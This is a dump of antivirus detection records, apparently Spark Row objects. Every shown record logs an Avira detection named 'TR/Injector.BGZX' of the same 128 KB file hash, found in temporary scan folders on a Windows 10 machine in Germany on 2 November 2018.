  Row(detection=Row(filename='avscan-20181102-062511-058709b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062511-058709B4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060836-b464ce6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060836-B464CE6A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055041-3395efc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055041-3395EFC0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055304-88c2a620', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055304-88C2A620', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062511-05ad528a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062511-05AD528A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055335-9b7ae590', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055335-9B7AE590', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055005-1e60babd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055005-1E60BABD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062543-18fccbc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062543-18FCCBC9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062543-18c25537', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062543-18C25537', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055008-204ba1c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055008-204BA1C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055031-2dabd111', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055031-2DABD111', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053642-3fc3dc36', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053642-3FC3DC36', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055316-9078a9e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055316-9078A9E2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062533-12b523b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062533-12B523B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055011-21feb7f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055011-21FEB7F8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055342-9fa243ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055342-9FA243ED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062533-12e7239b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062533-12E7239B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054035-cab3c58c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054035-CAB3C58C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062534-131ef43a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062534-131EF43A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060830-b114818f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060830-B114818F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055306-8a2a2701', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055306-8A2A2701', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062516-086f40e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062516-086F40E7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055316-90324ea3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055316-90324EA3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062515-081ada0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062515-081ADA0D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053603-288af38a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053603-288AF38A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051615-64a043b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051615-64A043B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055004-1df607b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055004-1DF607B1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061855-25ae6f06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061855-25AE6F06', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055342-9fbbf1d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055342-9FBBF1D8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055004-1dcbaf7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055004-1DCBAF7B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055328-9722c78c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055328-9722C78C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055319-91c044ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055319-91C044EE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055322-93f36f02', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055322-93F36F02', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055050-395f1df0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055050-395F1DF0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061602-be2a483d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061602-BE2A483D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061815-0d7266de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061815-0D7266DE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060839-b675a685', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060839-B675A685', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060839-b666f5df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060839-B666F5DF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054047-d19d05d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054047-D19D05D8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055042-34356f64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055042-34356F64', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061835-19c1d3c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061835-19C1D3C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060821-abe54977', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060821-ABE54977', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062134-845f8b00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062134-845F8B00', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051605-5e74e375', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051605-5E74E375', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060811-a591092e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060811-A591092E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062103-71d31de6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062103-71D31DE6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051645-764d8efa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051645-764D8EFA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053623-3447fa21', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053623-3447FA21', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061851-23169d4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061851-23169D4B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061638-d3f80621', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061638-D3F80621', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055035-2fff5a82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055035-2FFF5A82', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062109-7525d387', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062109-7525D387', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055352-a5bea891', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055352-A5BEA891', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061811-0b203b3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061811-0B203B3A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062102-711d4f3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062102-711D4F3B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:01Z'), dt=datetime.date(2018, 11, 2)),
